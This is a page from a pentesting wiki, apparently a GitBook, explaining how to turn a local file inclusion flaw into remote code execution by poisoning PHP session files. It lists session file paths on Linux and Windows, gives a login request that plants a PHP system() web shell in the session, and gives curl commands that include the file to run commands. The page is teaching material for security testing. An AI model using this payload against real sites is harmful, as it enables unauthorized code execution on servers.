Infiltr8: The Red-Book

Infiltr8 Forum GitHub

Infiltr8 Forum GitHub

The Red-Book
Red-Teaming
Web Pentesting
Network Pentesting
Active Directory Pentesting
🛠️Cloud & CI/CD Pentesting
🛠️Smart Contracts Pentesting
- Solidity
  - Vulnerabilities
    Delegatecall Attack
    Denial of Service Attack
    Overflow & Underflow
    Reentrancy Attack
    Self Destruct Attack
    Tx Origin Attack

Powered by GitBook

On this page

Was this helpful?

Last updated 1 year ago

Was this helpful?

Theory

If the website use PHP Session (PHPSESSID), we may poison cookies and include it throught LFI

Practice

First we should find where the sessions are stored, for example

Second, display a PHPSESSID to see if any parameter is reflected inside:

In this case, we can inject some PHP code in the reflected parameter in the session.

We can inject some PHP code in the reflected parameter in the session.

Use the LFI to include the PHP session file

Web Pentesting

Web Vulnerabilities

Server-Side

File Inclusion & Path Traversal

LFI to RCE

PHP Sessions

# Linux
/var/lib/php5/sess_[PHPSESSID]
/var/lib/php/sessions/sess_[PHPSESSID]

# Windows 
C:\Windows\Temp\sess_[PHPSESSID]

curl $URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

#Set cookie to <?php system($_GET['cmd']);?>
login=1&user=<?php system($_GET['cmd']);?>&pass=password&lang=en_us.php

curl $URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27?cmd=id

Theory
Practice